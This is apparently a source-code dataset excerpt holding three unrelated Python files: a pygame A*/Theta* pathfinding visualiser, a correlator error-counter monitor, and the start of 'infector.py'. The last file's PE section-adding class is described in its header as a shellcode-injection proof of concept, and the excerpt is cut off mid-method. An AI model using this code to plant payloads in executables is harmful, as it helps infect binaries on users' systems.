#-- This assigns to each vertex an array as a value. In the array, the first value is the x location, and then y (row), and 1 implies the vertex is unexplored. 0 will mean it is closed. The fourth value determines whether the vertex is in the fringe (1) or not (0)
#-- 5th value-g(A*), h(A*), f(A*), g(Theta*), h(Theta*), f(Theta*)
row=1
for i in range (graph.getNumVertices()):
    if(i%(colLength-1)==0 and i!=0):
        row=row+1
    # g values start at "infinity" (1e11 sentinel), h/f at 0 / infinity.
    graph.setVertex(i, [(i%(colLength-1))+1,row, 1, 0,100000000000.0,0.0, 100000000000.0,100000000000.0, 0.0, 100000000000.0])
#----- Connect vertices
# This just runs through and connects the vertices
# This is pretty complicated, and you don't need to worry about it. The code here should be right becuase the red edges are draen correctly
edgeCheck=[]
for row in range((rowLength-1)):
    for column in range(colLength-1):
        # (x, y) is the 1-based grid coordinate of vertex1.
        x=column+1
        y=row+1
        vertex1=(((colLength-1)*row)+column)
        # Horizontal neighbour (blocked only if BOTH adjacent cells are obstacles).
        vertex2=(((colLength-1)*row)+column)+1
        if((((colLength-1)*row)+column)<numVertices and edgeCheck.count([vertex2,vertex1])==0 and vertex1%(colLength-1)<(colLength-2)):
            if(not(obstacles.count([x,y])!=0 and obstacles.count([x,(y-1)])!=0)):
                #print "v1: " + str(vertex1) + "v2: " + str(vertex2)
                graph.addEdge(vertex1,vertex2, edge=1)
        # Vertical neighbour.
        vertex2=(((colLength-1)*row)+column)+(colLength-1)
        if((((colLength-1)*row)+column)<numVertices and edgeCheck.count([vertex2,vertex1])==0 and vertex2<numVertices):
            if(not(obstacles.count([x,y])!=0 and obstacles.count([(x-1),y])!=0)):
                #print "v1: " + str(vertex1) + "v2: " + str(vertex2)
                graph.addEdge(vertex1,vertex2, edge=1)
        #do the diagonals
        vertex2=(((colLength-1)*row)+column)+(colLength)
        if(obstacles.count([x,y])==0 and (((colLength-1)*row)+column)<numVertices and edgeCheck.count([vertex2,vertex1])==0 and vertex1%(colLength-1)<(colLength-1) and vertex1%(rowLength-1)<(rowLength-1) and vertex2<numVertices and vertex1%(colLength-1)!=(colLength-2)):
            graph.addEdge(vertex1,vertex2, edge=math.sqrt(2))
        # Anti-diagonal.
        vertex1=(((colLength-1)*row)+column)
        vertex2=(((colLength-1)*row)+column)+(colLength-2)
        if((((colLength-1)*row)+column)<numVertices and vertex1%(colLength-1)<(colLength-1) and vertex1%(rowLength-1)<(rowLength-1) and vertex2<numVertices and vertex1%(colLength-1)!=0):
            if(not(obstacles.count([(x-1),y])!=0)):
                graph.addEdge(vertex1,vertex2, edge=math.sqrt(2))
numEdges=graph.getNumEdges()
print "\nVertices: " + str(graph.getNumVertices())
print "Edges: " + str(graph.getNumEdges())
#-----------------------------------
# Here is where we choose a random start/goal locations. You probably don't need to touch any of this.
if(file_provided==False):
    goal=[]
    start=[]
    #---- Get random start ------------------
    # NOTE(review): `i` here is the leftover index from the vertex-init loop
    # above (== numVertices-1), reused as the sampling range -- fragile.
    while start==[]:
        id=int((i*random.random())%i)
        vrtx=graph.getVertex(id)
        # Require a connected, non-border vertex.
        if(len(graph.neighbours(id))>1):
            x=vrtx[0]
            y=vrtx[1]
            if(x!=0 and x!=colLength and y!=0 and y!=rowLength):
                start=[x,y]
    #---- Get random goal -------------------
    while goal==[]:
        id=int((i*random.random())%i)
        vrtx=graph.getVertex(id)
        if(len(graph.neighbours(id))>1):
            x=vrtx[0]
            y=vrtx[1]
            if(start!=[x,y] and x!=0 and x!=colLength and y!=0 and y!=rowLength):
                goal=[x,y]
print "Start: " +str(start)
print "Goal: " +str(goal)
#--------------------------------------------------------------
##############################################################################
##############################################################################
# WRITE OUT TO FILE (write the obstacle out if the file is not provided)
# NOTE(review): the triple-quoted block below is disabled code (references an
# undefined `t`); kept verbatim as a no-op string literal.
"""
name="test_samples/"+str(t)+".txt"
print "Printing file: " + name
if(file_provided==False):
fout=open(name, "w")
for i in range (len(obstacles)):
item=obstacles[i]
fout.write(str(item[0]))
fout.write(" ")
fout.write(str(item[1]))
fout.write("\n")
#write out start
fout.write(str(start[0]))
fout.write(" ")
fout.write(str(start[1]))
fout.write("\n")
#write out goal
fout.write(str(goal[0]))
fout.write(" ")
fout.write(str(goal[1]))
fout.write("\n")
fout.close()
"""
##############################################################################
##############################################################################
##############################################################################
#parent list (parent[v] == -1 means v was never reached)
parent=[-1 for x in range(graph.getNumVertices())]
parentTheta=[-1 for x in range(graph.getNumVertices())]
parentV=[-1 for x in range(graph.getNumVertices())]
#run A*
a_star=A_star.A_star(graph,[])
parent=a_star.run(start, goal)
#run Theta*
theta_star=Theta_star.Theta_star(graph,obstacles)
parentTheta=theta_star.run(start, goal)
#check if anyone found path
child=functions.getVertexID(goal[0], goal[1])
parents=parent[child]
parentT=parentTheta[child]
if (parents==-1 and parentT==-1):
    print "No paths found!"
    sys.exit()
#############################################################################
#############################################################################
#############################################################################
#run A* on visibility graph
# Collect the candidate visibility-graph vertices: start, goal, and the four
# corners of every interior obstacle cell.
corners=[start,goal]
for i in range (len(obstacles)):
    value=obstacles[i]
    if(value[0]!=0 and value[1]!=0 and value[0]!=(colLength-1) and value[1]!=(rowLength-1)):
        corners.append(value)
        corners.append([value[0]+1,value[1]])
        corners.append([value[0],value[1]+1])
        corners.append([value[0]+1,value[1]+1])
# open_vrts = grid-vertex ids whose coordinates match some corner.
open_vrts=[]
count=0
for i in range (graph.getNumVertices()):
    value=graph.getVertex(i)
    found=False
    #check each corner
    for j in range (len(corners)):
        obs_val=corners[j]
        if(value[0]==obs_val[0] and value[1]==obs_val[1]):
            found=True
            break
    if(found!=False):
        open_vrts.append(i)
        count=count+1
#** make new graph
numFeatures=0
numVertices=(rowLength-1)*(colLength-1)
vList=GeneralVertexList(numVertices)
weightMatrix = scipy.sparse.lil_matrix((numVertices, numVertices))
graph_new = SparseGraph(vList,True, W=weightMatrix) # HERE IS YOUR GRAPH!
#-- This assigns to each vertex an array as a value. In the array, the first value is the x location, and then y (row), and 1 implies the vertex is unexplored. 0 will mean it is closed. The fourth value determines whether the vertex is in the fringe (1) or not (0)
#-- 5th value-g(A*), h(A*), f(A*), g(Theta*), h(Theta*), f(Theta*)
row=1
for i in range (graph_new.getNumVertices()):
    if(i%(colLength-1)==0 and i!=0):
        row=row+1
    graph_new.setVertex(i, [(i%(colLength-1))+1,row, 1, 0,100000000000.0,0.0, 100000000000.0,100000000000.0, 0.0, 100000000000.0])
#print "old: " + str(graph.getNumEdges()) + " new graph: " + str(graph_new.getNumEdges())
#check is another file is available
# Optional second argument: precomputed visibility edges ("node1 node2" lines).
edge_file=False
if(len(sys.argv)>2):
    try:
        fin=open(sys.argv[2], "r")
    except IOError:
        print '\nERROR: Cannot open file, will use random obstacles and start/goal'
    else:
        print sys.argv[2]
        edge_file=True
        #read every thing from file
        fileInfo=[]
        fileInfo.append(fin.readline())
        while fileInfo[len(fileInfo)-1]:
            fileInfo.append(fin.readline())
        # Get obstacles from file
        for i in range (len(fileInfo)-1):
            val= (fileInfo[i].split(' '))
            node1=int(val[0])
            node2=int(val[1])
            v1=graph_new.getVertex(node1)
            v2=graph_new.getVertex(node2)
            graph_new.addEdge(node1,node2, edge=functions.getDistance(v1[0],v1[1],v2[0],v2[1]))
#run A* on visibility graph
visibility_a_star=A_star.A_star(graph_new, open_vrts)
parentV=visibility_a_star.run_visibility(start, goal,obstacles, open_vrts,graph, edge_file)
# NOTE(review): disabled edge-dump code kept verbatim as a no-op string.
"""
#---- out put the edges
name="test_samples/"+str(t)+"edges.txt"
print "Printing file: " + name
if(file_provided==False and edge_file==False):
fout2=open(name, "w")
edges=graph_new.getAllEdges();
for i in range (len(edges)):
item=edges[i]
fout2.write(str(item[0]))
fout2.write(" ")
fout2.write(str(item[1]))
fout2.write("\n")
fout2.close()
"""
#############################################################################
#############################################################################
#############################################################################
# UNCOMMENT THIS WHEN NOT SCRIPTING
pygame.init()
# Set the height and width of the screen
size = [colLength*(width+margin)+1, rowLength*(width+margin)+1]
#size=[613,313]
screen = pygame.display.set_mode(size)
pygame.display.set_caption("Path Visualization")
#Loop until the user clicks the close button.
done = False
# Used to manage how fast the screen updates
clock = pygame.time.Clock()
blockedDone=False
# -------- Main Program Loop ----------- ######################################
while done==False:
    for event in pygame.event.get(): # User did something
        if event.type == pygame.QUIT: # If user clicked close
            done=True # Flag that we are done so we exit this loop
        elif event.type == pygame.MOUSEBUTTONDOWN:
            # Clicking a cell dumps its f/g/h values for all three searches.
            cursor = event.pos#pygame.mouse.get_pos()
            row_=int(math.floor(cursor[1]/(margin+width)))
            col_=int(math.floor(cursor[0]/(margin+width)))
            print("x: " + str(col_ ))
            print("y: " + str(row_ ))
            print("Vertex: " + str(functions.getVertexID(col_, row_)))
            vertexInfo=graph.getVertex(functions.getVertexID(col_, row_))
            visibility_info=graph_new.getVertex(functions.getVertexID(col_, row_))
            print "A* --- f: " + str(vertexInfo[6]) + " g: " + str(vertexInfo[4] )+ " h: " +str(vertexInfo[5])
            print "Theta* --- f: " + str(vertexInfo[9]) + " g: " + str(vertexInfo[7] )+ " h: " +str(vertexInfo[8])
            print "Visibility+A* --- f: " + str(visibility_info[6]) + " g: " + str(visibility_info[4] )+ " h: " +str(visibility_info[5])
        #check for pressed key to pick start
        elif event.type == pygame.KEYDOWN:
            if pygame.key.name(event.key)=="return":
                print "\nStarting Algorithm. . . "
                done=True
    # Set the screen background
    screen.fill(black)
    # ALL CODE TO DRAW SHOULD GO BELOW THIS COMMENT #############################
    offset = margin + width
    # Draw the grid -----------------
    for row in range(rowLength):
        startY = row * offset
        for column in range(colLength):
            #check for blocked cell
            foundCell=False
            for [x, y] in obstacles:
                if [column, row]==[x,y]:
                    foundCell=True
            #make cell gray or white (border and obstacles are gray)
            if column==0 or row==0 or column==(colLength-1) or row==(rowLength-1) or foundCell==True:
                sqrColor=gray
                pygame.draw.rect(screen,sqrColor,[(margin+width)*column+margin,(margin+height)*row+margin,width,height])
            else:
                sqrColor = white
                pygame.draw.rect(screen,sqrColor,[(margin+width)*column+margin,(margin+height)*row+margin,width,height])
            # for drawing forward diagonals in the squares
            startX = column * offset
            if (column!=0 and row!=0 and column!=(colLength-1) and row!=(rowLength-1)) and foundCell==False:
                lineColor = black
                pygame.draw.line(screen, lineColor, [startX, startY], [startX + offset, startY + offset], margin)
    # draw the backward diagonals
    for row in range(rowLength):
        startY = row * offset
        for column in range(colLength):
            #check for blocked cell
            foundCell=False
            for [x, y] in obstacles:
                if [column, row]==[x,y]:
                    foundCell=True
            # for drawing backward diagonals in the squares
            startX = offset + margin
            startX += column * offset
            if (column!=0 and row!=0 and column!=(colLength-1) and row!=(rowLength-1)) and foundCell==False:
                lineColor = black
                pygame.draw.line(screen, lineColor, [startX, startY], [startX - offset, startY + offset], margin)
    # Draw the visibility-graph edges in black.
    edges=graph_new.getAllEdges();
    for i in range (len(edges)):
        node1=[(((edges[i][0]%(colLength-1))+1)*(width+margin)),(((edges[i][0]/(colLength-1))+1)*(width+margin))]
        node2=[(((edges[i][1]%(colLength-1))+1)*(width+margin)),(((edges[i][1]/(colLength-1))+1)*(width+margin))]
        #print str(node1)+" "+str(node2)
        pygame.draw.line(screen, black, (node1[0], node1[1]), (node2[0], node2[1]), 1)
    # Trace the A* path (red) by walking the parent chain from goal to start.
    child=functions.getVertexID(goal[0], goal[1])
    parents=parent[child]
    if (parents!=-1):
        while(not(parents==functions.getVertexID(start[0], start[1]) and child==functions.getVertexID(start[0], start[1]))):
            xLoc1=(((child%(colLength-1))+1)*(width+margin))
            yLoc1=(((child/(colLength-1))+1)*(width+margin))
            xLoc2=(((parents%(colLength-1))+1)*(width+margin))
            yLoc2=(((parents/(colLength-1))+1)*(width+margin))
            pygame.draw.line(screen, red, (xLoc1, yLoc1), (xLoc2, yLoc2), 2)
            child=parents
            parents=parent[child]
    #print the Theta* (blue)
    child=functions.getVertexID(goal[0], goal[1])
    parents=parentTheta[child]
    if (parents!=-1):
        while(not(parents==functions.getVertexID(start[0], start[1]) and child==functions.getVertexID(start[0], start[1]))):
            xLoc1=(((child%(colLength-1))+1)*(width+margin))
            yLoc1=(((child/(colLength-1))+1)*(width+margin))
            xLoc2=(((parents%(colLength-1))+1)*(width+margin))
            yLoc2=(((parents/(colLength-1))+1)*(width+margin))
            pygame.draw.line(screen, blue, (xLoc1, yLoc1), (xLoc2, yLoc2), 2)
            child=parents
            parents=parentTheta[child]
    #print the Theta* (visibility-graph path, light blue)
    child=functions.getVertexID(goal[0], goal[1])
    parents=parentV[child]
    if (parents!=-1):
        while(not(parents==functions.getVertexID(start[0], start[1]) and child==functions.getVertexID(start[0], start[1]))):
            xLoc1=(((child%(colLength-1))+1)*(width+margin))
            yLoc1=(((child/(colLength-1))+1)*(width+margin))
            xLoc2=(((parents%(colLength-1))+1)*(width+margin))
            yLoc2=(((parents/(colLength-1))+1)*(width+margin))
            pygame.draw.line(screen, light_blue, (xLoc1, yLoc1), (xLoc2, yLoc2), 2)
            child=parents
            parents=parentV[child]
    # Mark the start (green) and goal (pink) cells.
    insert=(int(math.ceil(start[0]*(margin+width))), int(math.ceil(start[1]*(margin+width))))
    pygame.draw.circle(screen,green,insert,int(.5*width),int(.5))
    insert=(int(math.ceil(goal[0]*(margin+width))), int(math.ceil(goal[1]*(margin+width))))
    pygame.draw.circle(screen,pink,insert,int(.5*width),int(.5))
    #------------------------------
    #---------ALL CODE TO DRAW SHOULD GO ABOVE THIS COMMENT --------
    # Limit to 20 frames per second
    clock.tick(9000)
    # update the screen
    pygame.display.flip()
#####---------END FIRST DISPLAY LOOP ---------#################################
# Be IDLE friendly. If you forget this line, the program will 'hang' on exit.
pygame.quit()
|
UTF-8
|
Python
| false | false | 2,013 |
2,886,218,024,710 |
a18c095efa35d70f7eec76d613f560634243df9a
|
9f7ab3623b1139c3d54377639f606739b9e010b1
|
/corr-0.4.2.2010-10-14/scripts/corr_read_missing.py
|
d5691bd8888370f4a2c588b85eede4201eebc773
|
[
"GPL-2.0-or-later"
] |
non_permissive
|
zakiali/PAPERCORR
|
https://github.com/zakiali/PAPERCORR
|
c98a157a52c25c5d5322ab6368a69cf5c6847822
|
8816b49401e2dbd9995e9ea76788627eaebc9741
|
refs/heads/master
| 2020-05-28T08:05:46.016329 | 2012-07-30T20:13:44 | 2012-07-30T20:13:44 | 2,115,716 | 3 | 2 | null | false | 2012-06-11T18:27:00 | 2011-07-27T22:57:39 | 2012-06-11T18:26:59 | 2012-06-11T18:26:59 | 128 | null | null | null |
Python
| null | null |
#! /usr/bin/env python
"""
Reads the error counters on the correlator and reports accumulated XAUI and
packet errors.
\n\n
Revisions:
2009-12-01 JRM Layout changes, check for loopback sync
2009/11/30 JRM Added support for gbe_rx_err_cnt for rev322e onwards.
2009/07/16 JRM Updated for x engine rev 322 with KATCP.
"""
import corr, time, sys,struct,logging
def exit_fail():
print 'FAILURE DETECTED. Log entries:\n',lh.printMessages()
print "Unexpected error:", sys.exc_info()
try:
c.disconnect_all()
except: pass
raise
exit()
def exit_clean():
    """Disconnect from all correlator servers (best effort) and exit."""
    try:
        c.disconnect_all()
    except: pass
    exit()
if __name__ == '__main__':
    from optparse import OptionParser
    p = OptionParser()
    p.set_usage('read_missing.py [options] CONFIG_FILE')
    p.set_description(__doc__)
    opts, args = p.parse_args(sys.argv[1:])
    if args==[]:
        print 'Please specify a configuration file! \nExiting.'
        exit()
lh=corr.log_handlers.DebugLogHandler()
try:
    print 'Connecting...',
    c=corr.corr_functions.Correlator(args[0],lh)
    # Level 10 == DEBUG for every per-server logger.
    for s,server in enumerate(c.config['servers']): c.loggers[s].setLevel(10)
    print 'done.'
    servers = c.servers
    n_xeng_per_fpga = c.config['x_per_fpga']
    n_xaui_ports_per_fpga=c.config['n_xaui_ports_per_fpga']
    xeng_acc_len=c.config['xeng_acc_len']
    start_t = time.time()
    #clear the screen:
    print '%c[2J'%chr(27)
    # Poll all error/packet counters every 2 s and print a per-FPGA report.
    while True:
        loopback_ok=c.check_loopback_mcnt()
        # Each read_uint_all returns one value per FPGA; indexed [port][fpga].
        xaui_errors=[c.read_uint_all('xaui_err%i'%(x)) for x in range(n_xaui_ports_per_fpga)]
        xaui_rx_cnt=[c.read_uint_all('xaui_cnt%i'%(x)) for x in range(n_xaui_ports_per_fpga)]
        gbe_tx_cnt =[c.read_uint_all('gbe_tx_cnt%i'%(x)) for x in range(n_xaui_ports_per_fpga)]
        gbe_tx_err =[c.read_uint_all('gbe_tx_err_cnt%i'%(x)) for x in range(n_xaui_ports_per_fpga)]
        rx_cnt = [c.read_uint_all('rx_cnt%i'%(x)) for x in range(min(n_xaui_ports_per_fpga,n_xeng_per_fpga))]
        gbe_rx_cnt = [c.read_uint_all('gbe_rx_cnt%i'%x) for x in range(min(n_xaui_ports_per_fpga,n_xeng_per_fpga))]
        gbe_rx_err_cnt = [c.read_uint_all('gbe_rx_err_cnt%i'%x) for x in range(min(n_xaui_ports_per_fpga,n_xeng_per_fpga))]
        gbe_rx_down = [c.read_uint_all('gbe_rx_down') for x in range(min(n_xaui_ports_per_fpga,n_xeng_per_fpga))]
        rx_err_cnt = [c.read_uint_all('rx_err_cnt%i'%x) for x in range(min(n_xaui_ports_per_fpga,n_xeng_per_fpga))]
        loop_cnt = [c.read_uint_all('loop_cnt%i'%x) for x in range(min(n_xaui_ports_per_fpga,n_xeng_per_fpga))]
        loop_err_cnt = [c.read_uint_all('loop_err_cnt%i'%x) for x in range(min(n_xaui_ports_per_fpga,n_xeng_per_fpga))]
        mcnts = [c.read_uint_all('loopback_mux%i_mcnt'%(x)) for x in range(min(n_xaui_ports_per_fpga,n_xeng_per_fpga))]
        x_cnt = [c.read_uint_all('pkt_reord_cnt%i'%(x)) for x in range(n_xeng_per_fpga)]
        x_miss = [c.read_uint_all('pkt_reord_err%i'%(x)) for x in range(n_xeng_per_fpga)]
        last_miss_ant = [c.read_uint_all('last_missing_ant%i'%(x)) for x in range(n_xeng_per_fpga)]
        vacc_cnt = [c.read_uint_all('vacc_cnt%i'%x) for x in range(n_xeng_per_fpga)]
        vacc_err_cnt = [c.read_uint_all('vacc_err_cnt%i'%x) for x in range(n_xeng_per_fpga)]
        # Split each 32-bit mcnt: upper 16 bits = loopback mcnt, lower 16 = gbe mcnt.
        loopmcnt=[]
        gbemcnt=[]
        for mi,mv in enumerate(mcnts):
            loopmcnt.append([mv[x]/(2**16) for x,f in enumerate(c.fpgas)])
            gbemcnt.append([mv[x]&((2**16)-1) for x,f in enumerate(c.fpgas)])
        sum_bad_pkts = sum([sum(x_miss_n) for x_miss_n in x_miss])/xeng_acc_len
        sum_xaui_errs = sum([sum(xaui_error_n) for xaui_error_n in xaui_errors])
        sum_spectra = sum([sum(engcnt) for engcnt in x_cnt])
        # move cursor home
        print '%c[2J'%chr(27)
        for fn,fpga in enumerate(c.fpgas):
            print ' ', servers[fn]
            for x in range(n_xaui_ports_per_fpga):
                print '\tXAUI%i RX cnt: %10i Errors: %10i'%(x,xaui_rx_cnt[x][fn],xaui_errors[x][fn])
                print '\t10GbE%i TX cnt: %10i Errors: %10i'%(x,gbe_tx_cnt[x][fn],gbe_tx_err[x][fn])
            for x in range(min(n_xaui_ports_per_fpga,n_xeng_per_fpga)):
                print "\t10GbE%i RX cnt: %10i Errors: %10i"%(x,gbe_rx_cnt[x][fn],gbe_rx_err_cnt[x][fn])
                print "\t10Gbe%i RX DOWN: Errors: %10i" %(x,gbe_rx_down[x][fn])
                print '\tLoopback%i cnt: %10i Ovrflw: %10i'%(x,loop_cnt[x][fn],loop_err_cnt[x][fn])
                print "\tLoopback_mux%i cnt: %10i Errors: %10i"%(x,rx_cnt[x][fn],rx_err_cnt[x][fn])
                print '\t Loopback%i mcnt: %6i'%(x,loopmcnt[x][fn])
                print '\t GBE%i mcnt: %6i'%(x,gbemcnt[x][fn])
            for x in range(n_xeng_per_fpga):
                print '\tX engine%i Spectr cnt: %10i Errors: %10.2f'%(x,x_cnt[x][fn],float(x_miss[x][fn])/float(xeng_acc_len)),
                if x_miss[x][fn]>0: print 'Last missing antenna: %i'%last_miss_ant[x][fn]
                else: print ''
                print "\tVector Accum%i cnt: %10i Errors: %10i"%(x,vacc_cnt[x][fn],vacc_err_cnt[x][fn])
            print ''
        print 'Total number of spectra processed: %i'%sum_spectra
        print 'Total bad X engine data: %i packets'%sum_bad_pkts
        print 'Total bad XAUI packets received: %i'%sum_xaui_errs
        print 'Loopback muxes all syncd: ',loopback_ok
        print 'Time:', time.time() - start_t
        time.sleep(2)
except KeyboardInterrupt:
    exit_clean()
except:
    exit_fail()
exit_clean()
|
UTF-8
|
Python
| false | false | 2,012 |
15,479,062,162,803 |
12b5d7c85564eadaf31cb4c2641e569693296ba3
|
8e34b9614abef45bc9a82b5b8aa07da32530d7ab
|
/infector.py
|
bcabfbcbbcf0a1ad6728dd7d0d6eba7dd35d094b
|
[] |
no_license
|
ActorExpose/peinfector
|
https://github.com/ActorExpose/peinfector
|
729a34a1dbdc4cefd9e51999ae71f0ce79b3f709
|
a39e7defdde21a8dc175e6bd4b559ca3aca2361f
|
refs/heads/master
| 2021-05-27T20:48:04.815182 | 2014-03-10T12:32:27 | 2014-03-10T12:32:27 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
#!/usr/bin/env python2
#============================================================================================================#
#===========================================================================================================#
#======= Simply injects a shellcodie into a BMP. ====================================================#
#======= Author: marcoramilli.blogspot.com ==================================================================#
#======= Version: PoC (don't even think to use it in development env.) ======================================#
# SUPER Thanks to n0p for his SectionDoubleP implementation
#======= Disclaimer: ========================================================================================#
#THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
#IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
#DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
#INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
#SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
#HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
#STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
#IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
#POSSIBILITY OF SUCH DAMAGE.
#===========================================================================================================#
#===========================================================================================================#
from pefile import PE
from struct import pack
import peutils
import pefile, pydasm, sys
class SectionDoublePError(Exception):
    """Raised by SectionDoubleP when a section cannot be added or removed."""
    pass
class SectionDoubleP:
def __init__(self, pe):
    """Wrap an already-parsed pefile.PE instance; all edits mutate it in place."""
    self.pe = pe
def __adjust_optional_header(self):
    """Recompute the optional header's size fields after the section list
    changed: SizeOfImage from the new last section, and the three Size*
    totals from each section's characteristics flags."""
    header = self.pe.OPTIONAL_HEADER
    last_section = self.pe.sections[-1]
    # SizeOfImage = VirtualAddress + VirtualSize of the new last section.
    header.SizeOfImage = last_section.VirtualAddress + last_section.Misc_VirtualSize
    # Rebuild the totals from scratch, bucketed by section characteristics:
    # 0x20 = contains code, 0x40 = initialized data, 0x80 = uninitialized data.
    header.SizeOfCode = sum(
        s.SizeOfRawData for s in self.pe.sections
        if s.Characteristics & 0x00000020)
    header.SizeOfInitializedData = sum(
        s.SizeOfRawData for s in self.pe.sections
        if s.Characteristics & 0x00000040)
    header.SizeOfUninitializedData = sum(
        s.SizeOfRawData for s in self.pe.sections
        if s.Characteristics & 0x00000080)
def __add_header_space(self):
    """ To make space for a new section header a buffer filled with nulls is added at the
        end of the headers. The buffer has the size of one file alignment.
        The data between the last section header and the end of the headers is copied to
        the new space (everything moved by the size of one file alignment). If any data
        directory entry points to the moved data the pointer is adjusted.
    """
    FileAlignment = self.pe.OPTIONAL_HEADER.FileAlignment
    SizeOfHeaders = self.pe.OPTIONAL_HEADER.SizeOfHeaders
    data = '\x00' * FileAlignment
    # Adding the null buffer.
    self.pe.__data__ = (self.pe.__data__[:SizeOfHeaders] + data +
                        self.pe.__data__[SizeOfHeaders + len(data):])
    # Section table starts after the DOS header, the 4-byte PE signature,
    # the file header and the optional header.
    section_table_offset = (self.pe.DOS_HEADER.e_lfanew + 4 +
                            self.pe.FILE_HEADER.sizeof() + self.pe.FILE_HEADER.SizeOfOptionalHeader)
    # Copying the data between the last section header and SizeOfHeaders to the newly allocated
    # space.
    offset_new_section = section_table_offset + self.pe.FILE_HEADER.NumberOfSections*0x28
    size = SizeOfHeaders - offset_new_section
    data = self.pe.get_data(offset_new_section, size)
    self.pe.set_bytes_at_offset(offset_new_section + FileAlignment, data)
    # Checking data directories if anything points to the space between the last section header
    # and the former SizeOfHeaders. If that's the case the pointer is increased by FileAlignment.
    for dir in self.pe.OPTIONAL_HEADER.DATA_DIRECTORY:
        if offset_new_section < dir.VirtualAddress and dir.VirtualAddress < SizeOfHeaders:
            dir.VirtualAddress += FileAlignment
    self.pe.OPTIONAL_HEADER.SizeOfHeaders += FileAlignment
    # The raw addresses of the sections are adjusted (PointerToRawData lives
    # at offset 0x14 of each 0x28-byte section header).
    section_raw_address = section_table_offset + 0x14
    for section in self.pe.sections:
        self.pe.set_dword_at_offset(section_raw_address, section.PointerToRawData+FileAlignment)
        section_raw_address += 0x28
    # Re-parse so pefile's section objects reflect the moved headers.
    self.pe.parse_sections(section_table_offset)
def __is_null_data(self, data):
    """Return True if `data` consists entirely of null bytes.

    Vacuously True for empty data, matching the original loop.
    """
    # all() short-circuits at the first non-null byte, like the original loop.
    return all(char == '\x00' for char in data)
def pop_back(self):
    """Remove the last section of the section table.

    Strips the section's raw data from the file image, nulls out its
    header fields, pops it from pefile's section list, decrements
    NumberOfSections and recomputes the optional-header sizes.

    Raises SectionDoublePError if there is no section to remove.
    """
    # Checking if there are any sections to pop.
    if ( self.pe.FILE_HEADER.NumberOfSections > 0
         and self.pe.FILE_HEADER.NumberOfSections == len(self.pe.sections)):
        # Stripping the data of the section from the file.
        if self.pe.sections[-1].SizeOfRawData != 0:
            self.pe.__data__ = self.pe.__data__[:-self.pe.sections[-1].SizeOfRawData]
        # Overwriting the section header in the binary with nulls.
        # Getting the address of the section table and manually overwriting
        # the header with nulls unfortunally didn't work out.
        self.pe.sections[-1].Name = '\x00'*8
        self.pe.sections[-1].Misc_VirtualSize = 0x00000000
        self.pe.sections[-1].VirtualAddress = 0x00000000
        self.pe.sections[-1].SizeOfRawData = 0x00000000
        self.pe.sections[-1].PointerToRawData = 0x00000000
        self.pe.sections[-1].PointerToRelocations = 0x00000000
        self.pe.sections[-1].PointerToLinenumbers = 0x00000000
        self.pe.sections[-1].NumberOfRelocations = 0x0000
        self.pe.sections[-1].NumberOfLinenumbers = 0x0000
        self.pe.sections[-1].Characteristics = 0x00000000
        self.pe.sections.pop()
        self.pe.FILE_HEADER.NumberOfSections -=1
        self.__adjust_optional_header()
    else:
        raise SectionDoublePError("There's no section to pop.")
    def push_back(self, Name=".NewSec", VirtualSize=0x00000000, VirtualAddress=0x00000000,
                RawSize=0x00000000, RawAddress=0x00000000, RelocAddress=0x00000000,
                Linenumbers=0x00000000, RelocationsNumber=0x0000, LinenumbersNumber=0x0000,
                Characteristics=0xE00000E0, Data=""):
        """ Adds the section, specified by the functions parameters, at the end of the section
        table.
        If the space to add an additional section header is insufficient, a buffer is inserted
        after SizeOfHeaders. Data between the last section header and the end of SizeOfHeaders
        is copied to +1 FileAlignment. Data directory entries pointing to this data are fixed.
        A call with no parameters creates the same section header as LordPE does. But for the
        binary to be executable without errors a VirtualSize > 0 has to be set.
        If a RawSize > 0 is set or Data is given the data gets aligned to the FileAlignment and
        is attached at the end of the file.
        Invalid VirtualAddress/RawAddress arguments are silently replaced by
        computed, correctly-aligned values.
        Raises SectionDoublePError on a too-long name, when no header space can
        be allocated, or when pefile's view of the section table is inconsistent.
        """
        if self.pe.FILE_HEADER.NumberOfSections == len(self.pe.sections):
            FileAlignment = self.pe.OPTIONAL_HEADER.FileAlignment
            SectionAlignment = self.pe.OPTIONAL_HEADER.SectionAlignment
            # PE section names are at most 8 bytes (not NUL-terminated).
            if len(Name) > 8:
                raise SectionDoublePError("The name is too long for a section.")
            # The new section must start after the previous one and on a
            # SectionAlignment boundary; otherwise compute a valid address.
            if ( VirtualAddress < (self.pe.sections[-1].Misc_VirtualSize +
                self.pe.sections[-1].VirtualAddress)
                or VirtualAddress % SectionAlignment != 0):
                if (self.pe.sections[-1].Misc_VirtualSize % SectionAlignment) != 0:
                    VirtualAddress = \
                        (self.pe.sections[-1].VirtualAddress + self.pe.sections[-1].Misc_VirtualSize -
                        (self.pe.sections[-1].Misc_VirtualSize % SectionAlignment) + SectionAlignment)
                else:
                    VirtualAddress = \
                        (self.pe.sections[-1].VirtualAddress + self.pe.sections[-1].Misc_VirtualSize)
            if VirtualSize < len(Data):
                VirtualSize = len(Data)
            if (len(Data) % FileAlignment) != 0:
                # Padding the data of the section.
                Data += '\x00' * (FileAlignment - (len(Data) % FileAlignment))
            # Honor an explicitly larger, aligned RawSize by padding further;
            # anything else is clamped to the (already aligned) data length.
            if RawSize != len(Data):
                if ( RawSize > len(Data)
                    and (RawSize % FileAlignment) == 0):
                    Data += '\x00' * (RawSize - (len(Data) % RawSize))
                else:
                    RawSize = len(Data)
            section_table_offset = (self.pe.DOS_HEADER.e_lfanew + 4 +
                self.pe.FILE_HEADER.sizeof() + self.pe.FILE_HEADER.SizeOfOptionalHeader)
            # If the new section header exceeds the SizeOfHeaders there won't be enough space
